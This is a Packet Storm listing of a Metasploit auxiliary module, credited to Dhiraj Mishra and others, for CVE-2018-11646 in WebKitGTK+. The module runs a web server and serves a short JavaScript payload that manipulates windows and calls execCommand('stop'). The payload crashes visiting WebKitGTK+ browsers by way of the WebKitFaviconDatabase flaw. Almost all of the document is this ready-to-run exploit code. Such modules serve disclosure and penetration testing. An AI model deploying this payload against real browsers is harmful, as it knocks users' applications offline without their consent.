Lucene search

K
packetstormMishra DhirajPACKETSTORM:148135
HistoryJun 11, 2018 - 12:00 a.m.

WebKitGTK+ WebKitFaviconDatabase Denial Of Service

2018-06-1100:00:00
Mishra Dhiraj
packetstormsecurity.com
19

0.81 High

EPSS

Percentile

98.0%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS",  
'Description' => %q(  
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.  
If successful, it could lead to application crash, resulting in denial of service.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'Dhiraj Mishra', # Original discovery, disclosure  
'Hardik Mehta', # Original discovery, disclosure  
'Zubin Devnani', # Original discovery, disclosure  
'Manuel Caballero' #JS Code  
],  
'References' => [  
['EDB', '44842'],  
['CVE', '2018-11646'],  
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],  
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']  
],  
'DisclosureDate' => 'Jun 03 2018',  
'Actions' => [[ 'WebServer' ]],  
'PassiveActions' => [ 'WebServer' ],  
'DefaultAction' => 'WebServer'  
)  
)  
end  
  
def run  
exploit # start http server  
end  
  
def setup  
@html = <<-JS  
<script type="text/javascript">  
win = window.open("WIN", "WIN");  
window.open("http://example.com/", "WIN");  
win.document.execCommand('stop');  
win.document.write("HelloWorld");  
win.document.close();  
</script>  
JS  
end  
  
def on_request_uri(cli, _request)  
print_status('Sending response')  
send_response(cli, @html)  
end  
end  
`